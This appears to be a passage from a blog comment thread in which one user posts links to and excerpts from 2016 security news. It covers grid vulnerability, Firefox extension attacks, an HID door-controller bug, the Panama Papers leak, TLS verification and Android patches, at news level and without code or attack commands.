The reality is that we will need to wait for the reports from forensic investigators before any conclusion can be reached on who hacked Mossack Fonseca and even then we may not get the whole truth.
Tomi Engdahl says:
U.S. Electric Grid – America the Vulnerable
http://www.securityweek.com/us-electric-grid-america-vulnerable
In the new digital age, the threat of cyber attack reaches every part of modern society. Electrical power runs just about every aspect of life for most people, and most are not prepared when the power source is interrupted or goes away. A public announcement could be made one week ahead of time, and the majority of people would still be in the same vulnerable position if the power were to go away abruptly.
Last year Lloyd’s published a report titled “Business Blackout” where they shared their analysis and findings of an imminent cyber attack on the U.S. power grid. In their attack scenario, attackers were able to inflict physical damage on 50 of the 700 generators on the electrical grid on the east coast where there is a substantial population of people in major cities that includes New York City, Washington D.C. and Boston. In this situation, 93 million people were affected by a blackout.
There would most certainly be mass chaos among the population, and the total impact to the USA in the Lloyd’s report is estimated at $243 billion dollars and rising to over $1 trillion in extreme cases. In an already fragile and recovering economy, an attack like this could cripple the country and most certainly disrupt any momentum the economy had been able to gain.
Not only is this scenario possible, I believe it is imminent. Based on existing intelligence, it is reasonable to assume that nation-states already possess all the information they need to launch such an attack on the U.S. power grid – they choose not to because of political implications. I also believe the USA possesses the same capabilities. It isn’t just nation-states that we need to be concerned with, as radical terrorist groups are highly motivated to bring harm to the American people and economy.
Within the energy sector, here are just a few examples of reported attacks or attempted attacks:
• In 2012 and 2013 Russian hackers were able to successfully send and receive encrypted commands to the U.S. power generators.
• The Department of Homeland Security (DHS) announced last year that unauthorized cyber hackers were able to inject malicious software into the grid operations that allowed spying on U.S. energy companies.
• In October of last year, US law enforcement officials reported a series of cyber attacks that were attempted by ISIS targeting the U.S. power grid.
• In December 2015, the Associated Press reported that “security researcher Brian Wallace was on the trail of hackers who had snatched a California university’s housing files when he stumbled into a larger nightmare: cyber attackers had opened a pathway into the networks running the United States power grid.”
Home Security Deputy Secretary Alejandro Mayorkas acknowledged in an interview, “we are not where we need to be” on cybersecurity.
The Good News – And Practical Tips to Reduce the Threat Surface
Tomi Engdahl says:
Establishing Correspondence Between an Application and its Source Code
http://www.securityweek.com/establishing-correspondence-between-application-and-its-source-code
How Combining Two Completely Separate Open Source Projects Can Make Us All More Secure
When you run an application, how can you verify that what you are running was actually built from the code that a trusted developer wrote?
When you get the application from a distribution rather than from the developer, you are trusting that the distribution performed the same validation that you would have done (or better). Now you, as the end-user, get the installable package from the distribution. You install it on your system and you run the executable contained within the package. You don’t have to compile it because that is one of the value-added functions of the distributor. The package management system handles the verification of the package before it is installed.
Now, as the end-user, how do you know that the executable that you were running is what the open source developer originally wrote? Many distributions alter the code before they ship it to apply bug patches and security fixes.
The Reproducible Builds Project intends to solve that problem. The goal of the Reproducible Builds Project is to ensure that if a package is built on one system and then again on a different but similar system, the outputs are directly comparable. This can be verified using the diffoscope tool produced by the project or, in many cases, by comparing cryptographic hashes of the two packages to ensure that they are identical.
The Reproducible Builds project is writing tools to facilitate comparison of two separately generated packages, fixing toolchain issues, and working with the upstream developers to fix any problems which cause the source not to be reproducibly buildable. Subtle corruptions of individual machines in a build system become detectable when previously reproducibly buildable packages suddenly start failing verification.
In summary, the Reproducible Builds project is working to ensure the package will be identical to packages built on another similar system using the same source code so that the integrity of the package can be validated.
The Integrity Measurement Architecture (IMA-appraisal) component of the Linux kernel has the capability of validating a file’s integrity based on the file’s signature stored as an extended attribute, before allowing the file to be accessed
This model of integrity is not completely realized today. Some steps are not yet complete – IMA is still considered experimental, patches to Debian packaging system to include signed file hashes have been submitted, but not yet accepted, the Reproducible Builds Project has made amazing strides but work has not yet been completed.
https://reproducible-builds.org/
Reproducible builds are a set of software development practices which create a verifiable path from human readable source code to the binary code used by computers.
Tomi Engdahl says:
The Accountability Gap: Getting Business to Understand Security
http://www.securityweek.com/accountability-gap-getting-business-understand-security
A new survey and report from Tanium and NASDAQ, using a research team from Goldsmiths, University of London, seeks to quantify organizations’ cyber security vulnerability.
The bottom-line conclusions from the response analysis will surprise no-one involved in cyber security – only 10% of respondents have a low level of vulnerability. The vast majority of organizations (80%) are deemed to have “a medium level of vulnerability.”
This is mirrored in the report detail. For example, only 13% of the most vulnerable NEDs are briefed regularly on cybersecurity legislation and regulation, and just 8% are regularly briefed on current threats. This compares to 100% and 96% respectively for the least vulnerable. There is a close correlation between poor information exchange between Business and Security and a poor security posture.
However, knowing there is a problem, and knowing what to do about it, are two different things.
The real difficulty is in getting Business to accept that it needs to understand Security.
The report’s own primary conclusion is that organizations need to ‘create a culture of openness’. “Boards need to know what questions to ask in order to understand the state of cybersecurity of the business. These can be supplemented by detailed in-house or externally facilitated briefings for directors to ensure they have the skills to provide adequate oversight. Board members need to learn how to ask questions the same way they do for financial concerns and, in some cases, certain board members responsible for cyber should be given extended training.”
Tomi Engdahl says:
Cyber Situational Awareness and the Kill Chain
http://www.securityweek.com/cyber-situational-awareness-and-kill-chain
The concept of the cyber kill chain has done a lot to advance the general understanding of how attacks unfold and how to combat them. The steps – reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives – each have implications for how, as security professionals, we can strengthen our defenses. Initially these defenses concentrated on the network, and specifically the perimeter. But today, as attacks have increased in sophistication and frequency, it takes more to be a kill chain “killjoy.”
Take for example, the first step in the kill chain – reconnaissance. An adversary surveys the target and seeks out weaknesses, potential vectors, and other information to assist with an attack. Organizations traditionally address this step in a number of ways, including firewall or proxy logs, honeypots and network-based intrusion detection systems (NIDS). But, unfortunately, these only aim to detect threats that directly target the perimeter network and fail to address other important threats, such as data that already found a way outside the organization through many different means, including:
• Stolen credentials available on sites, such as Pastebin
• Sensitive documents being openly shared on the web due to misconfigured, consumer-grade storage devices or public folders in cloud storage sites like Dropbox that might reveal sensitive internal information
• Proprietary source code and admin passwords that somehow find their way on code sharing sites, such as GitHub
• Social media platforms that can potentially provide a gold mine of information that threat actors could use to craft a spear phishing campaign
Tomi Engdahl says:
The Case for a Virtual Security Box
http://www.securityweek.com/case-virtual-security-box
The abundance of security solutions flooding the market (and IT racks) has not resulted in any a strong confidence for preventing cyber-attacks.
• 400+ companies presented at the recent RSA conference.
• About 10% of that number – 40-50 security products of different types – are typically deployed at any organization.
• When surveyed, only 75% of security professionals were confident in their team’s ability to detect and respond to incidents. While this may not sound that bad, among those 75 percent, 6 in 10 did not believe their staff can handle anything beyond simple cybersecurity incidents.
If you’ve been around the security industry the past years, you’re probably not surprised. Companies are adding more and more security solutions, some overlapping, with uncoordinated responses. The result is de-optimization of cyber security investment, accompanied by unmanageable noise, alerts and maintenance tasks.
Can the rules of the game be changed?
Let me introduce the concept of a “Virtual Security box.”
Virtual Security Box – Orchestrating All Security Policies
How would this work? First, the Virtual Security Box dynamically integrates with existing security products – whether it’s reputation, anti-malware, IDS/IPS, user and network behavior analysis, firewalls, antivirus or others. It transforms all security products and services into virtual security resources, decoupled from the underline security physical infrastructure. To begin with, this provides a unified playground with a single security language, rather than disparate silos, each with its own rules, terminology etc.
What are the other characteristics of the Virtual Security Box?
• Mix and match. The Virtual Security Box analyzes and rate the quality of each of the existing security products. It then selects and assigns the most relevant and best security resource for each task, completely decoupled from the underline physical security infrastructure. For example, to protect against a privileges escalation attack, it may select Product A to execute the ‘brute-force’ protection policy, and Product B to execute the ‘privilege escalation intrusion’ protection and ‘pre-attack probes’ policy.
• Orchestration. A Virtual Security Box can create and update activity flows between logical resources and thus transform the siloed security infrastructure into a cyber security system that can react much faster and in a more efficient manner to emerging advanced attack campaigns. It can instantly identify and asses the risk and activate the right resource at the right time.
Tomi Engdahl says:
What are you doing to spot a breach?
It’s probably already happened, but you just haven’t seen it…
http://www.theregister.co.uk/2016/03/08/spotting_modern_cyberthreats/
Technology moves quickly, not just in legitimate business, but in the cybercriminal world too. Advanced attack tools are now available on the black market, lowering the barrier to entry for the average online lowlife. They are happy to target large and small organizations alike, and they only have to be lucky once.
Security pros have been forced to prepare for a world of constant, sustained attack by understanding the threats and choosing the right measures to prepare for them. Companies are realising the extent of the threat and gearing up for it, say experts.
“We have seen information security budgets increasing in the last 12 months to address the challenges that cyber crime is bringing to the organisation,” said Steve Durbin, managing director of the Information Security Forum.
So what kinds of threats are they dealing with, and how can they prepare?
What are the threats and where are they coming from?
The cyberthreats facing modern companies fall into various categories, and they’re loosely linked to the type of cybercriminal that you’re dealing with and the kind of information that they’re after. Hacktivism has traditionally been characterised by attacks with a relatively low barrier to entry such as DDoS and web site defacements, for example.
While hackers’ motives are frequently political or ideological, financial cybercriminals are interested purely in money, and are adept in their pursuit of it. Some will attempt to transfer money out of an organization, while others will focus on saleable information. Malware typically underpins a financial cybercrime attack.
How do you live with attackers getting in, and continue to fight them?
Over the years, the focus on keeping attackers out at all costs has shifted towards managing them when they break into an organization. Security professionals seem to be tacitly admitting that network intrusion is a question of ‘when’, rather than ‘if’.
“15 years ago, the focus was keeping them out. Today, organizations are starting to realize they have to deal with a certain degree of compromise,” explained Stephen Northcutt, director of academic advising for the SANS Technology Institute.
How do you distinguish between normal behaviour/threats
Distinguishing between these different modes of behaviour is an important skillset for IT departments trying to spot attackers inside their network, but it’s doable with the right tools, say experts. It’s all a question of mathematics, said Northcutt.
“Twenty years ago the US Navy spent about a million dollars for a bunch of PhD statisticians to determine that like groups of people using like systems have a very similar network traffic footprint,”
Where do you start when choosing tools
Training people to be security aware is an important part of stopping breaches, but CISOs will never eradicate those problems entirely. A technology layer provides a vital layer of protection. Don’t be distracted by emotions or industry buzzwords when choosing these tools, said Stevens.
Best of breed vs holistic approach
Should companies buy a single security platform offering a holistic approach, or focus on point solutions instead?
“I would always vote on holistic, mainly because we aren’t seeing point channel solutions that are very effective,” said Stevens.
Tomi Engdahl says:
Top Firefox extensions can hide silent malware using easy pre-fab tool
The fix? No patch, just destroy all extensions.
http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/
Black Hat Asia The most popular Firefox extensions with millions of active users are open to attacks that can quietly compromise machines and pass Mozilla’s automated and human security tests.
The extension reuse attacks exploit weaknesses in the structure of Firefox extensions such that malicious activity can be hidden behind legitimate functionality.
For example, attackers could duplicate a popular but vulnerable extension to reuse attacks and write their own machine-pwning functionalities.
The researchers explained that extensions run with elevated privileges and access to information, so a malicious extension could steal private browsing data, passwords, and sensitive system resources.
The extensions vulnerable to the 255 reuse exploits found included NoScript with 2.5 million users, Video DownloadHelper with 6.5 million users, and GreaseMonkey with 1.5 million users. Adblock Plus with its 22 million users was unaffected.
“We a have a lot of trust placed in browser vendors … but if you think about it, really squint your eyes, the extension framework really is a backdoor for potentially untrusted third parties to run code in a highly-privileged context,” Robertson says.
“We really shouldn’t have trust in the extension authors.
“The combination of automated analysis, manual review, and extension-signing – the vetting model that underpins all of Firefox’s extension security – if something goes wrong, then all bets are off.”
And things did go wrong. The pair were able to upload a malicious, but ultimately harmless proof-of-concept, extension to the Firefox extension shop even passing a requested more intensive ‘fully reviewed’ analysis. The extension dubbed ValidateThisWebsite contained 50 lines of code and no obfuscation.
“The more power vulnerable extensions have, the easier it is for an evil extension to work,” Buyukkayhan says.
“The full review is the highest level of security Mozilla has.”
Tomi Engdahl says:
Hackers demo persistent, quiet attacks through Windows DSC
Desired State Configuration tool can create state of chaos
http://www.theregister.co.uk/2016/04/05/audio_hackers_demo_persistent_quiet_attacks_through_windows_dsc/
AUDIO from Black Hat Asia Forensics men Matt Hastings and Ryan Kazanciyan have flipped the Windows Desired State Configuration (DSC) into a covert persistence mechanism and weapon in a new attack vector to own Windows boxes.
The Tanium security duo released the DSCompromised framework of Powershell scripts and modules that help attackers use DSC, while smoothing over otherwise confusing and undocumented bugs.
They told Black Hat Asia in Singapore last week that attackers abusing DSC can continually and covertly re-infect Windows systems.
The pair say they were keen to showcase the new attack and suggested defences to the security community before criminals find the vector on their own.
“If not properly remediated, DSC will automatically re-infect the victim by re-dropping the file and re-executing the malware without notifying the user,” Kazanciyan says.
Tomi Engdahl says:
‘Devastating’ bug pops secure doors at airports, hospitals
Hackers don’t need authentication to easily open every door using popular HID controllers.
http://www.theregister.co.uk/2016/04/04/devastating_bug_pops_secure_doors_at_airports_hospitals/
Criminals could waltz into secure zones in airports and government facilities by hacking and jamming open doors from remote computers over the Internet, DVLabs researcher Ricky Lawshae says.
The since-patched vulnerabilities affect HID’s flagship VertX and Edge controllers which are distributed in scores of busy locations and large global enterprises.
The devices are used in airports including Nanchang Changbei International Airport and the Southern Ohio Medical Center.
Popping the controllers grants attackers access to locks and alarms, and makes it “impossible” for administrators to regain command of the doors.
All it takes Lawshae says is “a few simple UDP packets” for the “potentially devastating bug” to be exploited. Authentication is not required.
Lawshae says the attacks, which can open every door in a building, are possible because of a command injection vulnerability in a LED blinking lights service.
“To make matters worse, the discovery service runs as root, so whatever command we send it will also be run as root, effectively giving us complete control over the device.”
Tomi Engdahl says:
Mobe and Wi-Fi firms flog your location data to commercial firms, claim reports
That’s why you’re seeing loads of massage parlour ads
http://www.theregister.co.uk/2016/04/05/mobile_wifi_firms_sell_your_location_data_advertisers_others/
Two reports by privacy campaigners into mobile and Wi-Fi services’ location tracking activities have revealed practices of questionable legality and security.
The studies found that “at best, companies are fulfilling the minimal legal requirements, and at worst could breaking the law and breaching our right to privacy.”
The collection and exploitation of traffic and location data is detailed in two reports which are published today. The Open Rights Group (ORG) has provided a 44-page inquiry titled “Cashing in on your mobile?” (PDF), which reports on “how phone companies are exploiting their customers’ data.”
Pairing up, the advocacy groups have launched Opt Me Out Of Location “to encourage the British public to demand that mobile and Wi-Fi service providers are explicit about what they are asking their customers to opt into and provide clear choices for opting out.”
Tomi Engdahl says:
‘Panama papers’ came from e-mail server hack at Mossack Fonseca
Money-shuttling firm lost 2.6 TB of data and didn’t even notice
http://www.theregister.co.uk/2016/04/05/email_server_hack_led_to_mossack_fonseca_leak/
The staggering, Wikileaks-beating “Panama Papers” data exfiltration has been attributed to the breach of an e-mail server last year.
The leak of documents from Panama-based, internationally-franchised firm Mossack Fonseca appears to confirm what has long been suspected but rarely proven: well-heeled politicians, businesses, investors, and criminals use haven-registered businesses to hide their wealth from the public and from taxmen.
Bloomberg says co-founder Ramon Fonseca told Panama’s Channel 2 the leaked documents are authentic and were “obtained illegally by hackers”.
According to The Spanish, the whistleblower (here in Spanish) accessed the vast trove of documents by breaching Mossack Fonseca’s e-mail server, with the company sending a message to clients saying it’s investigating how the breach happened, and explaining that it’s taking “all necessary steps to prevent it happening again”.
Tomi Engdahl says:
Microsoft account-hijacking hole closed 48 hours after bug report
Token-harvesting attack meant one login could open doors to multiple Microsoft services
http://www.theregister.co.uk/2016/04/05/microsoft_brews_serves_accounthijack_hole_patch_in_two_days/
British researcher Jack Whitton has reported a Microsoft account hijacking authentication bug that would have been another arrow in an attacker’s phishing quiver, save for the fact that Microsoft fixed it.
Whitton quietly reported the flaw to Microsoft which pounced and took only two days to process and patch the flaw.
Tomi Engdahl says:
Android gets larger-than-usual patch bundle as researchers get to work
Monthly update goes out to Nexus owners, a few others
http://www.theregister.co.uk/2016/04/05/android_security_patch/
As a further sign that researchers are getting serious about finding holes in Android operating systems, Google has released one of its biggest ever monthly patch bundles, with 39 flaws fixed.
“The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files,” the update states. “There have been no reports of active customer exploitation or abuse of the other newly reported issues.”
Tomi Engdahl says:
Beware of Unverified TLS Certificates in PHP & Python
https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-python.html
Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN’s cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn’t verify the TLS certificate, a malicious person can steal your passwords or your customers’ credit card numbers.
When implemented correctly, the TLS protocol provides both encryption and authentication. The connection between your server and the API server is encrypted using a symmetric cipher (typically AES) so an eavesdropper cannot read your data. The server also confirms its identity (authenticates itself) by sending an X.509 certificate to the client. The client must verify the certificate’s signature against the list of known root certificates, but this step is often neglected. As a result, a man-in-the-middle attack becomes possible.
Tomi Engdahl says:
FBI Says a Mysterious Hacking Group Has Had Access to US Govt Files for Years
http://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years
The feds warned that “a group of malicious cyber actors,” whom security experts believe to be the government-sponsored hacking group known as APT6, “have compromised and stolen sensitive information from various government and commercial networks” since at least 2011, according to an FBI alert obtained by Motherboard.
The alert, which is also available online, shows that foreign government hackers are still successfully hacking and stealing data from US government’s servers, their activities going unnoticed for years. This comes months after the US government revealed that a group of hackers, widely believed to be working for the Chinese government, had for more than a year infiltrated the computer systems of the Office of Personnel Management, or OPM. In the process, they stole highly sensitive data about several millions of government workers and even spies.
In the alert, the FBI lists a long series of websites used as command and control servers to launch phishing attacks “in furtherance of computer network exploitation (CNE) activities [read: hacking] in the United States and abroad since at least 2011.”
Domains controlled by the hackers were “suspended” as of late December 2015, according to the alert, but it’s unclear if the hackers have been pushed out or they are still inside the hacked networks.
“Anybody who’s been in that network all this long, they could be anywhere and everywhere.”
FBI CYWATCH A-000067-DM
https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/
The FBI has obtained and validated information regarding a group of malicious cyber actors who have compromised and stolen sensitive information from various government and commercial networks. This group utilized the domains listed herein in furtherance of computer network exploitation (CNE) activities in the United States and abroad since at least 2011.
Tomi Engdahl says:
China Censors Online Discussion About Panama Papers
https://yro.slashdot.org/story/16/04/05/0233217/china-censors-online-discussion-about-panama-papers
China appears to be censoring social media posts on the Panama Papers document leak which has named several members of China’s elite, including President Xi Jinping’s brother-in-law. Hundreds of posts on networks such as Sina Weibo and Wechat on the topic have been deleted since Monday morning.
Panama Papers: Data Leak Exposes Massive Official Corruption
https://politics.slashdot.org/story/16/04/03/2026258/panama-papers-data-leak-exposes-massive-official-corruption
The hidden wealth of some of the world’s most prominent leaders, politicians and celebrities has been revealed by an unprecedented leak of millions of documents that show the myriad ways in which the rich can exploit secretive offshore tax regimes. The Guardian, working with global partners, will set out details from the first tranche of what are being called “the Panama Papers”. Journalists from more than 80 countries have been reviewing 11.5m files leaked from the database of Mossack Fonseca, the world’s fourth biggest offshore law firm.
Tomi Engdahl says:
Top Story: Cybersecurity experts warn that 75% of mobile apps are vulnerable to attack
http://www.komando.com/happening-now/348073/75-percent-of-mobile-apps-are-vulnerable-to-attack?elq_mid=7882&elq_cid=546544
Just like consumers are focusing more on mobile gadgets with each passing year, so are hackers. After all, your smartphone or tablet potentially contains browsing history, banking information, location history, text messages, photos and plenty more hackers can use to steal your identity and money.
Plus, from the hacker’s perspective, mobile gadget security isn’t quite as advanced as computer security. While gadgets’ built-in mobile security continues to improve, a lot of relies on keeping malicious apps out of the various app stores. Unfortunately, that doesn’t always work so well.
Hackers still do slip malicious apps into legitimate app stores. Plus, on Android, which can install apps from any source, there are plenty of third-party app stores just teeming with malicious apps. Hackers can even trick you into installing a malicious app from a text message.
In addition to malicious apps, there are a lot of legitimate apps out there that have flaws hackers can exploit. Because apps are so easy to make, a lot of app developers don’t have a background in security and don’t even think about it. Or they use code libraries that have flaws already in them.
So it isn’t a surprise that in its Cyber Risk Report for 2016, Hewlett Packard Enterprise found that 75% of the mobile apps it scanned contained a “critical or high-severity” vulnerability.
In fact, HPE doesn’t say if it only scanned apps from official app stores, or included third-party app stores as well
The most common mobile app flaws HPE found relate to internal worries, such as unencrypted storage (75%), the inability to tell the gadget is jailbroken or rooted (72%), misused push notifications (65%), location tracking (54%) and so forth
The biggest “critical-severity vulnerability” HPE found showed up in 30% of the apps, and it’s “Insecure Transport.” That means the app’s Internet communication isn’t encrypted or uses old or weak encryption, like old versions of OpenSSL (this was the flaw behind Heartbleed in 2014).
The second most common critical flaws is “Privacy Violation” (29%), which is apps reading too much information.
Tomi Engdahl says:
How Reporters Pulled Off the Panama Papers, the Biggest Leak in Whistleblower History
http://www.wired.com/2016/04/reporters-pulled-off-panama-papers-biggest-leak-whistleblower-history/
When Daniel Ellsberg photocopied and leaked the Pentagon Papers to the New York Times in 1971, those 7,000 pages of top secret Vietnam War documents represented what was then the biggest whistleblower leak in history—a couple dozen megabytes if it were contained in a modern text file. Almost four decades later, WikiLeaks in 2010 published Cablegate, a world-shaking, 1.73 gigabyte collection of classified State Department communications that was almost a hundred times bigger.
If there’s some Moore’s Law of Leaks, however, it seems to be exponential. Just five years have passed since WikiLeaks’ Cablegate coup, and now the world is grappling with a whistleblower megaleak on a scale never seen before: 2.6 terabytes, well over a thousandfold larger.
On Sunday, more than a hundred media outlets around the world, coordinated by the Washington, DC-based International Consortium of Investigative Journalists, released stories on the Panama Papers, a gargantuan collection of leaked documents exposing a widespread system of global tax evasion. The leak includes more than 4.8 million emails, 3 million database files, and 2.1 million PDFs from the Panamanian law firm Mossack Fonseca that, according to analysis of the leaked documents, appears to specialize in creating shell companies that its clients have used to hide their assets.
“This is pretty much every document from this firm over a 40-year period,”
The source warned that his or her ‘life is in danger,’ was only willing to communicate via encrypted channels, and refused to meet in person.
Neither the ICIJ nor any of the reporters it’s worked with have made the leaked data public. But the scandal resulting from their reporting has already touched celebrities, athletes, business executives and world leaders.
Icelandic Prime Minister Sigmundur Gunnlaugsson is facing demands from the previous Icelandic prime minister that he resign
But beyond those revelations—and there will likely be more as the reporting around the Panama Papers continues—the leak represents an unprecedented story in itself: How an anonymous whistleblower was able to spirit out and surreptitiously send journalists a gargantuan collection of files, which were then analyzed by more than 400 reporters in secret over more than a year before a coordinated effort to go public.
The Panama Papers leak began, according to ICIJ director Ryle, in late 2014, when an unknown source reached out to the German newspaper Suddeutsche Zeitung, which had reported previously on a smaller leak of Mossack Fonseca files to German government regulators.
“How much data are we talking about?” Obermayer asked.
“More than you have ever seen,” the source responded, according to Obermayer.
Obermayer tells WIRED he communicated with his source over a series of encrypted channels that they frequently changed, each time deleting all history from their prior exchange. He alludes to crypto apps like Signal and Threema, as well as PGP-encrypted email but declines to say specifically which methods they used.
After seeing a portion of the documents, Suddeutsche Zeitung contacted the ICIJ
Meanwhile, the shipments of leaked data continued piecemeal. “Over time we got more and more until we had all 11.5 million documents,” Ryle says.
“I learned a lot about making the safe transfer of big files,”
We’re not WikiLeaks. We’re trying to show that journalism can be done responsibly. ICIJ Director Gerard Ryle
The ICIJ’s developers then built a two-factor-authentication-protected search engine for the leaked documents, the URL for which they shared via encrypted email with scores of news outlets
The site even featured a real-time chat system, so that reporters could exchange tips and find translation for documents
You could see who was awake and working and communicate openly. We encouraged everyone to tell everyone what they were doing
Remarkably, despite all that broad access and openness, the full leaked database has yet to leak to the public—perhaps in part because it’s so large and unwieldy.
Ryle says that the media organizations have no plans to release the full dataset, WikiLeaks-style, which he argues would expose the sensitive information of innocent private individuals along with the public figures on which the group’s reporting has focused.
The leaks are bound to cause ripples around the world—not least of all for Mossack Fonseca itself.
Mossack Fonseca and its customers won’t be the last to face an embarrassing or even incriminating megaleak. Encryption and anonymity tools like Tor have only become more widespread and easy to use, making it safer in some ways than ever before for sources to reach out to journalists across the globe. Data is more easily transferred—and with tools like Onionshare, more easily securely transferred—than ever before.
The new era of megaleaks is already underway: The Panama Papers represent the fourth tax haven leak coordinated by the ICIJ since just 2013.
Tomi Engdahl says:
Security News This Week: Clever Malware Is Sending People Fake Speeding Tickets
http://www.wired.com/2016/04/security-news-week-clever-malware-sending-people-fake-speeding-tickets/
his week, the Apple-FBI legal fight finally, officially ended, as the feds at last found a way into San Bernardino shooter Syed Farook’s locked iPhone. Don’t get too comfortable, though, because this generation’s war between law enforcement and encryption technology has only just begun. They’ve still got lots of drug cases—the most common crime associated with requests to unlock phones—to crack, after all.
Elsewhere, we looked at how ISIS succeeds at social media, and at why the Department of Justice’s strategy of charging individuals, rather than nations, for hacking these here United States might backfire
Tomi Engdahl says:
Sources: Trump Hotels Breached Again
http://krebsonsecurity.com/2016/04/sources-trump-hotels-breached-again/
Banking industry sources tell KrebsOnSecurity that the Trump Hotel Collection — a string of luxury properties tied to business magnate and Republican presidential candidate Donald Trump — appears to be dealing with another breach of its credit card systems. If confirmed, this would be the second such breach at the Trump properties in less than a year.
A representative from Trump Hotels said the organization was investigating the claims.
On July 1, 2015, this publication was the first to report that banks suspected a breach at Trump properties.
The hospitality industry has been hit hard by card breaches over the past two years.
Like most other current presidential candidates, Mr. Trump has offered little in the way of a policy playbook on cybersecurity. But in statements last month, Trump bashed the United States as “obsolete” on cybersecurity, and suggested the country is being “toyed with” by adversaries from China, Russia and elsewhere.
“We’re so obsolete in cyber,” Trump told The New York Times. “We’re the ones that sort of were very much involved with the creation, but we’re so obsolete.”
Tomi Engdahl says:
UK journalist to appeal as Seoul blocks his site on N. Korea
http://bigstory.ap.org/article/55017001b152440395d99e777a047e47/journalist-appeal-after-seoul-blocks-site-north-korea
A British journalist who runs a website that documents North Korean technology issues said Tuesday that he’ll appeal a decision by South Korean authorities to block his site for allegedly violating the country’s National Security Law.
Martyn Williams, whose North Korea Tech website has been blocked in South Korea for almost two weeks, said the site does not violate the security law, which bans praising, sympathizing or cooperating with North Korea. The website “doesn’t seek to glorify or support North Korea,” Williams, who is based in San Francisco, said in an email.
Williams has written about issues ranging from cellphone usage in North Korea and its satellite technology, to a little-known computer operating system developed by North Koreans.
Tomi Engdahl says:
Cade Metz / Wired:
WhatsApp says it has enabled end-to-end encryption for all forms of communications on its service, which now has over a billion users, by default — Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People — For most of the past six weeks …
Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People
http://www.wired.com/2016/04/forget-apple-vs-fbi-whatsapp-just-switched-encryption-billion-people/
Mountain View is home to WhatsApp, an online messaging service now owned by tech giant Facebook, that has grown into one of the world’s most important applications. More than a billion people trade messages, make phone calls, send photos, and swap videos using the service. This means that only Facebook itself runs a larger self-contained communications network. And today, the enigmatic founders of WhatsApp, Brian Acton and Jan Koum, together with a high-minded coder and cryptographer who goes by the pseudonym Moxie Marlinspike, revealed that the company has added end-to-end encryption to every form of communication on its service.
Tomi Engdahl says:
Bug Bounty Guru Katie Moussouris Will Help Hackers and Companies Play Nice
http://www.wired.com/2016/04/bug-bounty-guru-katie-moussouris-will-help-hackers-companies-play-nice/
As chief policy officer at HackerOne, Katie Moussouris helped the Defense Department launch its Hack-the-Pentagon program—the first federal bug bounty program that promises to pay hackers who uncover vulnerabilities in the DoD’s public-facing web sites. That was after spending three years to convince Microsoft to launch its first bug bounty program in 2013. And now Moussouris is branching out as an independent consultant to help companies and organizations interested in launching bug bounty programs move from the thinking stage to the doing phase.
“There’s huge momentum not just in the government space, but in private industry, where you’re seeing all types of vendors, not just tech vendors, … working with hackers,” she says. From medical device manufacturers and healthcare organizations to car companies and home appliance makers, companies that never considered themselves software vendors are now having to grapple with some of the same issues that Microsoft and Google face. As they add more digital code to their products, they have to worry about software vulnerabilities and patches. With that comes an increasing need to work respectfully with the community of white hat hackers and researchers who find and report vulnerabilities to them.
“We are riding this big wave where hackers are more and more being viewed as helpful as opposed to harmful,” she says. “That’s where I want to help.”
Tomi Engdahl says:
Cade Metz / Wired:
WhatsApp says it has enabled end-to-end encryption for all forms of communication on its service, which now has over a billion users, by default — Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People — For most of the past six weeks …
Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People
http://www.wired.com/2016/04/forget-apple-vs-fbi-whatsapp-just-switched-encryption-billion-people/
Tomi Engdahl says:
Google’s Nexus security update for April fixes 8 critical Android bugs
http://techcrunch.com/2016/04/04/googles-april-nexus-security-update-fixes-8-critical-android-bugs/
Google is releasing the monthly security update for its Nexus Android devices today and with it, it is also announcing a list of the security vulnerabilities it has patched in this release. This month, the update includes patches for eight critical bugs, including one that affects the infamous libstagefright library, which has already seen its fair share of well-publicized vulnerabilities.
Google notified its partners about all the issues in this new bulletin two weeks ago and for them (and anybody else who is interested), source code patches will be made available through the Android Open Source Project in the next two days.
Nexus Security Bulletin—April 2016
http://source.android.com/security/bulletin/2016-04-02.html
The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files.
Android Security Advisory 2016-03-18 previously discussed use of CVE-2015-1805 by a rooting application. CVE-2015-1805 is resolved in this update.
The “Stagefright” hole in Android – what you need to know
https://nakedsecurity.sophos.com/2015/07/28/the-stagefright-hole-in-android-what-you-need-to-know/
Stagefright Detector
https://play.google.com/store/apps/details?id=com.zimperium.stagefrightdetector
Tomi Engdahl says:
Turkish Citizenship Database Leak (Corrected and Updated)
http://www.databreaches.net/turkish-citizenship-database-leak/
Who would have imagined that backwards ideologies, cronyism and rising religious extremism in Turkey would lead to a crumbling and vulnerable technical infrastructure?
This paste with a link to a 6.6 GB file, purportedly containing clear-text information on 49,611,709 Turkish citizens, including the following details:
National Identifier (TC Kimlik No)
First Name
Last Name
Mother’s First Name
Father’s First Name
Gender
City of Birth
Date of Birth
ID Registration City and District
Full Address
The hackers left a terse message:
Lesson to learn for Turkey:
Bit shifting isn’t encryption.
Index your database. We had to fix your sloppy DB work.
Putting a hardcoded password on the UI hardly does anything for security.
Do something about Erdogan! He is destroying your country beyond recognition.
Lessons for the US? We really shouldn’t elect Trump, that guy sounds like he knows even less about running a country than Erdogan does.
Tomi Engdahl says:
NoScript and other popular Firefox add-ons open millions to new attack
Unlike many browsers, Firefox doesn’t always isolate an add-on’s functions.
http://arstechnica.com/security/2016/04/noscript-and-other-popular-firefox-add-ons-open-millions-to-new-attack/
NoScript, Firebug, and other popular Firefox add-on extensions are opening millions of end users to a new type of attack that can surreptitiously execute malicious code and steal sensitive data, a team of researchers reported.
